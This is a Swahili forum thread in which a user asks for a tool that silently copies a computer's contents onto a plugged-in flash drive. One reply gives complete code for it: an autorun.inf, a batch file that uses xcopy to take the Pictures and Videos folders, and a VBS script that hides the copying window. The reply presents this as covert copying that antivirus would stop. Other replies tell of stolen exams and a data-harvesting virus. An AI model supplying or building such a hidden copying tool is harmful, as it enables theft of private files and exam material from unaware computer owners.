Hivi kuna App ya kucopy vitu automatic kwenye flash?

Kiti Chema

JF-Expert Member
Oct 18, 2017
1,793
1,941
Wadau hivi inawezekana kupata App ambayo ukiinstall kwenye frashi au external memory ukichomeka frash kwenye computer inacopy kila kilichomo automatic, kama ipo ya kununua au inayopatikana playstore naombeni link
 
Inakopy kutoka kwenye flash au computer? Inakopy kwa kudhamiria au kwa kificho?
 
Wadau hivi inawezekana kupata App ambayo ukiinstall kwenye frashi au external memory ukichomeka frash kwenye computer inacopy kila kilichomo automatic, kama ipo ya kununua au inayopatikana playstore naombeni link

Sio Frash, ni Flash
 
Kwa Msaada wa github

Code:
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

tengeneza file lenye jina autorun.inf

Code:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls

hapa badilisha au ongeza path kulingana na data unazotaka kucopy zipo folder gani
tengeneza file lenye jina file.bat

Code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

tengeneza file lenye jina invisible.vbs

Code:
wscript.exe \invisible.vbs file.bat

tengeneza filr lenye jina launch.bat

alafu ukimaliza copy izo file zi pest kenye flash unayotaka ku copy izo data.

kiufupi ni kwamba izo code hapo juu zitacopy file kwenye Os ya window bila kuonyesha ile panel ya ku copy

Screenshot (1401).png

ukisha chomeka hiyo drive kwenye PC unayotaka ku copy click file la launch.bat mzigo utaanza kujicopy wenyewe

Note: ikiwa kuna antivirus ipo active haita fanya kazi, zaidi ya hapo inabidi ujifunze hacking
 
Unanikumbusa series ya The Blacklist, Elizabeth Keen (police detective) kaingia ofisi ya manyamera kachomeka flash ikafyonza kila kitu bila interruption yeyote.
Afu nasikia chuo flani hapa TZ lecturer yuko pale mbele kwenye lile lidude (kama mimbari) minyamera ikasubir lecturer kazubaa ikachomeka flash ikafyonza kila kitu pamoja na test na mitihani ijayo.
 
Niliwahi ingia internet cafe mahali jamaa akaniambia computer zake zote harddrive zimejaa, kuja kuangalia kumbe ni virus anakusanya data za flashdisk zinazowekwa inaingiza kwa pc then inafanya uploading kwa huyo mpuuzi.
 
Back
Top Bottom